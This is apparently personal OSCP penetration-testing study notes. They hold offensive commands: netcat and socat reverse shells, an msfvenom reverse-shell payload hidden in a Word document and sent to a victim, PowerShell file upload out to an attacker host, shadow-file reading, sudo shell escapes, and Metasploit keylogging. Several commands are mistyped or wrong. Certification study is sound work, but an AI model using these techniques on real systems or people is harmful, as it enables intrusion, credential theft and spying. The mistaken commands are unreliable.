#Mohamed Mehanna

OSCP Notes:

********* Practical tools *************

1-Netcat:
- nc -n -v ip_address # to check connection to tcp and udp

- rdesktop IP_Address -u user -p password # to connect to the remote target

ex: rdesktop 193.227.34.143 -u mrtrojan -p 4019

- nc -nvlp 4444 # to recieve connection on that port

nc -n -v ip_address 4444 # to connect the open port

-nc -nvlp 4444 -e cmd.exe # that is a windows machine is ready to recive a

connection on port 4444

-nc -n -v IPaddress 4444 # once you type that script to the machine in linux ,
the cmd on windows machine will open with you and you can execute commands

-nc - nvlp 4444 -e /bin/bash # that is a linux machine wait to recieve a

connection

-nc -nvlp ip_address 4444 # now you will execute a commands

2- SOCAT

socat TCP-LISTEN:442 # to recieve a connection

socat - TCP:ip_address:port_number

---Transfer files by socat ----

-sudo socat TCP-LISTEN:443,fork file:password.txt # to send a file

-socat tcp:192.168.0.194:443 file:password.txt,create # to receive the file

------reverse shell of socat --------

-socat TCP4-LISTEN:443 STDOUT # to receive a connection

-socat TCP4:IpAddress:port(443) EXEC:/bin/bash # to execute a bash shell in the

another machine

-------- socat encrypted bind shell-----

-openssl req -newkey rsa:2048 -nodes -keyout bindshell.key -x509 -days 362 -out
bindshell.crt
 -sudo socat openssl-LISTEN:443,cert=bindshell.pem,verify=0,fork EXEC:c:/bin/bash

-socat - openssl:ipaddress:port_number(443),verify=0

-----------------------------------------

-Passive information Gathering

1-whois domain_name ex: whois google.com # to extract info about the domain

whois ip address ex: whois 193.227.34.143 # extract info about the website

2-Google Hacking

site:google.com -filetype:php # use that google dork to search for a file

inside a target that maybe senstitve

3-netcraft

https://searchdns.netcraft.com # to gather info about the domain

4-recon-ng

5-open source code : example you can use github to gather information about an
company ex : https://www.github.com/google

https://www.github.com/yahoo

6-shodan # smart search engine you can use it to search open devices conntected to
the internet

7-checking the security headers by that website : https://securityheaders.com/ ,

then type the doamin of the target and that website will check if the header of
(http, https) , prevent the attacks as xss and other exploitations

8-ssl server test : you can use that website to test ssl/tls of the website :
https://www.ssllabs.com/ssltest/

9-Pastebin : you can use the pastebin website to recon about the taregt

10-theharvester : that tool used to collect email address by that command line :
theharvester -d domain_name -b google

11-emailharvester -d yahoo.com # that tool used to collect email address about

the domain (target)

12-https://www.social-searcher.com # that website used to collect information

about organization or target on social media and posts or comments about that
target

13-https://digi.ninja/projects/twofi.php : # that website used to generate

worldlist to attack twitter account

14-https://github.com/initstring/linkedin2username: You use your valid LinkedIn

username and password to login, it will create several lists of possible username
formats for all employees of a company you point it at

15-stackoverflow : that website used to discussing the problems of software of

programming langauages , you can follow the answers of the problems , who answer
that problems maybe an employee in the organization , also if empolyess taking
about sensitive data , you can follow the unpachted vulnerabilities .

16-https://osintframework.com/ # you can use that framework on osint

17-maltego : that is a great tool in osint and info gathering

---------------------------------------------

-Active information gathering

-Dns enumration : use that command to extract the ip address of the domain => ex:
host yahoo.com

you can extract the related mail address by that command => host -t mx yahoo.com

host -t ns domain_name ex: host -t ns yahoo.com

-dnsenum domain_name ex: dnsenum yahoo.com => to enumrate the domain

-TCP/UDP scanning

TCP scaning : nc -nvv -w 1 -z ip_address port_number ex: nc -nvv -w 1 -z

192.168.1.15 288-300

UDP scaning : nc -nv -u -w 1 -z ip_adress port_number ex: nc -nv -u -w 1 -z

192.168.1.9

- sudo nmap -Pn 192.168.1.1/24 => to scan all active hosts on the network
- sudo nmap -O ip_address => to banner grabbing the os of the target ex : sudo
nmap -O 192.168.1.6
-sudo nmap -sV ip_addres of the target => used to banner grabbing the service
running on the target ex: nmap -sV ip_address

-sudo nmap -sV -sC ip_address => to scan the version of running services and use
scripts of the nmap

-sudo masscan -p80 --rate=100 ip_address => very fast tool to scan the port of the
target ex: sudo masscan -p80 --rate=100 192.168.0.1

masscan : that tool used to analyze packets send over the network

masscan -p80 ip_address/24 --rate=100 -e wlp9s0 --router-ip 192.168 ex: sudo

masscan -p12 98.138.11.157/24 --rate=100 -e wlp9s0 --router-ip 192.168.0.1

smb: protocol used to share files between computers

-Netbios : is a network service that enables applications on different computers to
communicate with each other across a local area network (LAN)

-sudo nbtscan -r ip_address => search for smb or netbios service on the target

-sudo smbclient -L ip_address => that tool try to connect to the smb service ex :
sudo smbclient -L 192.168.1.19

-sudo smbmap -H ip_address => that tool used to check to open ports or sevices of
smb ex : sudo smbmap -H 192.168.1.19
smb, netbois uses that port together 139,445

you can scan netbois service by nmap by that script : nmap -sV -p 139.445

-NFS : that protocol used as that => the client user can acces files throught the
network by nfs

rpcinfo -p ip_address # to show the running services on the target of rpcbind

showmount -e ip_address => to show if the running nfs on the target

snmp protocol : is an application layer protocol that utilizes the UDP protocol to
manage routers, hubs, and switches on an IP network .
-Snmp : you can scan it by nmap by that command => sudo nmap -p 161 ip_address

------------------------------------------------------------------
-Buffer Over flow (BOF):

Architecture fundementals

-number system
1-Binary => 0,1
2-Octal => 0,1,2,3,4,5,6,7
3-Decimal => 0,1,2,3,4,5,6,7,8,9
4-hexadecimal => 0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F

-RAM
bit ordered by 1-Big indian 2-Little indian

-----------------------------------------------------------------
-client side attack :

client side attack means the attacker sends you a macilious appliction or url

how to preform that :

1-install microsoft office , specifically the microsoft word
2-create payload by msfvenom => msfvenom -p windows/shell_reverse_tcp
LHOST=your_ip_address LPORT=any_port -f hta-psh -o /home/evill.hta

- there is two ways to deliver the exploit to the victim

1-copy the source code of the maclious code (evil.hta) and create file with
extension (bat) ex : evill.bat ,and put the source code inside it . , then open
microsoft word=> insert=> object=> select file (evil.bat) , send send the word file
to the victim

-then open netcat and use that command : nc -nvlp 4444( port you selected on the
maclious code )

2-the another way to deliver it to the victim is to send it the victim by link and
he/she download it , in the same time you open netcat to recieve a reverse
connection
 ---------------------------

-Search exploits

the most popular websites

1-Exploit-DB or Exploit-DB/rss.xml
2-securityfocus.com
3-packetstorm
4-Google Dorking

-you can search offline for exploits as follow =>

1-searchsploit (vulnerability_name) ex: searchsploit ftp

2-you can use nmap , the scripts inside that directory => /usr/share/nmap/scripts

-sudo nmap --scripts=(the script of vulnerability) => to turn on the scripts on

the vuln target

3-metasploit => msfconsole # to run metalsploit

msf6> search (vulnerability_name) ex: search ssh

------------------------------------------

-File transfer

-once you get a rce (session) of the target , you should upgrade the shell and make
it persistent , you can access it any time by following steps:

1- python -c 'import pty; pty.spawn("/bin/bash")'

2-stty raw -echo
3-crtl+z => to exit
4-fg

-tOo upload a file from an attacker machine to victim machine by that following
steps:
1-simplehttpserver

-Attacker machine => python -m SimpleHTTPServer 80

-victim machine => wget http://192.168.1.9/pass.txt

after the pervious steps , you now has a persistent shell , you can access it any
time

-we assume that a file we will download it to the victim machine , we follow that :
1- exe2hex -x file_name -p nc.cmd
2-copy the hex code of nc.cmd and paste it in the shell of the victim

-now we transfered that file to the victim

-how to download files from the victim to the attacker

=> use that command => powershell (New-Object
System.Net.WebClinet).UploadFile('http://192.168.1.9/uploads,the file you want to
download )
https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-
cheatsheet/

----------------------------------
Antivirus Evasion

-bypassing antivirus detection

1-ON-DISk evasion
-packers
-obfuscators
-crypter
-software protector

2-in memeory Evasion

- you can create paylods by fatrat or msfvenom that tools will help use to evate
the antirus

===================================================
-Privillege Escalation

types of privillege escalation:

1-horizontal
2-vertical

-how can i escalate the privillege ?

1-Information gathering
(1)-manual enumration
windows :
whoami=> the current user
net user => the current users running on the system
net user (the name of the user) ex: net user mrtrojan => to display more
details about the user

Linux:
whoami => the current user
cat /etc/passwd => all users on the system

(2)enumerating the hostname

windows :
hostname => the type of the machine (webserver,database or domain
controller)
-systeminfo => to extract all information

Linux :
hostname => the type of that os (webserver ,database or doamin controller)
uname -a => all info related the system
cat /etc/issue => the version of the os

(3)enumrating the running proccess and services

windows :
tasklist /svc => extract all the running process
 Linux :
ps aux => extract all running process and services

2-Enumrating the Network Information

-you need to enumarte the internal open ports , you can only access it from the
internal network by the target you hacked

Windows :
netstat -ano => extract all the open ports on the machine

Linux :
ss -anp => extract the ports is opend

3-Enumrate the firewalls status and rules

windows :

netsh advfirewall show currentprofile => to display the information about

the firewall
netsh adfirewall show rule name=all

linux:
iptables

4-Enumrating scedule tasks

n
Linux:
sudo nano /etc/crontab => by that command you can add a script to run hourly
daily monthly

Windows :
ls -lah /etc/cron*

5-Enumerating installed applications and level of patchs

Windows :

# that two commands display information about the installed applications

wmic product get name ,version ,vendor

vmic qfe get Caption, Description, HotFixID, InstalledOn

Linux :
dpkg -l => extract the installed application

-Enumerating read/writable file/directories

*note: to find the root directories may help in privilege scalation we use that
command
Linux
find / -writable -type d 2>/dev/null => extract all directories included in root
directory

-Enumerate unmounted disks :

Windows:
 mountvol => extract the disks

Linux :
mount => extract the mounted disks

-Enumerating drivers and kernal modules

Windows :
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display
Name’, ‘Start Mode’, 'Paged Pool(bytes)’, Path

Linux :
lsmod => extract the all modules of kernal
modinfo (name of mode ) ex modinfo wmi => to extract all informtion about the
the module speicified

--------------------------------------------------------
Windows privilege escalation

-automated Enumeration

-tryhackme exercises

-------------------------------

Linux privilege escalation

-sudo vim -c ':!/bin/sh'

sudo nmap --interactive => allows you to run commands , it in nmap version 5

-the most famous tool for linux privilege escalation are (lipease , lienum)

==============================LINUX PRIVILEGE ESCALATION

================================

System Information

#OS info

-cat /proc/version || uname -a 2>/dev/null

-cat /etc/os-release 2>/dev/null # common used in modern universal os

#PATH_persmission

$PATH # to extract who can execute that path (usr or root)

#Enviroment _info (password,apis, also interesting info)

(env || set) 2>/dev/null

#Kernel exploits

cat /proc/version
uname -a
 searchsploit "linux kernal"

-to search for kernal exploits you can use that tool => linux-exploit-suggester.sh

cat ~/.bash_history | grep -i passw => that command used to display the history of
logined passwords

cat /etc/passwd => to disply the users

cat /etc/shadow => to display the passwords

#sudo version

sudo --version # to display the version of sudo

searchsploit "sudo version" ex: searhsploit sudo 1.9.5p

#AppArmor => make the adminstrator control on linux (programs ,etc)

if [ `which aa-status 2>/dev/null` ]; then

aa-status
elif [ `which apparmor_status 2>/dev/null` ]; then
apparmor_status
elif [ `ls -d /etc/apparmor* 2>/dev/null` ]; then
ls -d /etc/apparmor*
else
echo "Not found AppArmor"
fi

#Grseacurity: grsecurity is a set of patches for the Linux kernel which emphasize
security enhancements. The patches are typically used by computer systems which
accept remote connections from untrusted locations

(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

#PAX

(which paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo "Not found PaX")

#EXesheild : aim of reducing the risk of worm or other automated remote attacks on
Linux systems

(grep "exec-shield" /etc/sysctl.conf || echo "Not found Execshield")

#SElinux:Security-Enhanced Linux is a Linux kernel security module that provides a

mechanism for supporting access control security policies, including mandatory
access controls.

(sestatus 2>/dev/null || echo "Not found sestatus")

#ASLR:Address space layout randomization is a computer security technique involved

in preventing exploitation of memory corruption vulnerabilities.

cat /proc/sys/kernel/randomize_va_space 2>/dev/null

#If 0, not enabled , if any number as 2 (that is enabled)

note*******============== I stoped in Docker securtiy (privilege escalation) in

hackthe tricks************=======

Port tunneling and redirection

read : hacktricks (port tunneling and redirecting)

-the attacker hacked a machine in private network , and discover a server is port
80 is open , so attacker can not access server port 80 from his machine , so the
attacker will make port tunneling that make the hacked machine access port 80 and
forward the packet to the attacker machine , finally the attacker can acces port 80
of the server

there are too many secnaerios :

1- Local port forwarding by that command :

sudo ssh -L Localhost:localport:target_ip:target_port user@meditior(hacked machine)

ex: sudo ssh -L 127.0.0.1:80:192.168.1.19:80 [email protected] => now the
port 80 will forward a packet to the attacker

-You can use any port number greater than 1024 as a LOCAL_PORT. Ports numbers less
than 1024 are privileged ports and can be used only by root

2-Remote Port forwarding : you forward the traffic from the remote ssh server to
tha attacker machine , if you have access on the server machine :

sudo ssh -R the_attacker_port:remote_server_host:server_port user@attacker_host

sudo ssh -R 8080:127.0.0.1:300 [email protected]

3-Dynamic port forwarding : Dynamic port forwarding allows you to create a socket
on the local (ssh client) machine, which acts as a SOCKS proxy server. When a
client connects to this port, the connection is forwarded to the remote (ssh
server) machine, which is then forwarded to a dynamic port on the destination
machine

sudo -D port_number of attacker user@attacker_host => that command should

runs on the remote machine

sudo -D 8090 [email protected]

then open browser firefox => proxy > socks > 127.0.0.1 > port number (8090)
==================================== ACTIVE DIRECTORY
============================================================

-Domain Controller (DC):

A domain controller is a server that responds to security authentication requests
within a computer network domain. It is a network server that is responsible for
allowing host access to domain resources. It authenticates users, stores user
account information and enforces security policy for a domain

-Active directory : the service runinng in the domain controller (DC)

-that is a great resource to gain a strong understand of AD:

https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-active-directory.md

====================================MetaSploit=====================================
============================

*****services you need to run before run meta*****

-sudo systemctl start postgresql
-sudo systemctl enable psotgresql

-sudo msfdb init => to start and configure database

-sudo apt install metasploit-framework => to update metasploit exploits and
payloads

-msfconsole => to start metasploit framework

- msf> help => to show all commands

msf > workspace -a module_name ex : workspace -a hacker => to create workspace

has its own targets and scanned serviecs

msf> search type:auxiliary name:smb => to search a exploits inside a module

msf> info -d exploit_name ex:info -d auxiliary/dos/http/ws_dos => will open the

browser and will show you how to perform the expoilt

- you can use that website http://shodan.io => to search for random targets
example : vuln:ms17_010 in shodan for targets vulnerable with eternalblue
or in metasploit : search ms17_010

-before run the payload youb should run that script , automatically run the script
after sending the payload by that :
msf> set AutoRunScript (script) ex: set AutoRunScript transport => to make the
connection live if one protocols down

-after hacking a target that is an important commands to do in the target machine

(post exploitation)
msf> getsystem => to be the system admin
msf> ps => the running process
msf> migrate proccess_id => to be an normal user to example turn on the keylogger
that requite normal user not system admin
msf > keyscan_start => to start the keylogger
 msf> load powershell => to load the powrshell and execute commands
msf> load kiwi
msf> play /home/mrtrojan/hack.mp4 => to run that video in the vivtim pv
background

- you can type a script with the extension rc ex script.rc => and run that script
with metasploit by that command
msfconsole -r script.rc

#Finally I would say thanks to read my basic notes of that course , wish you all
the best , hacker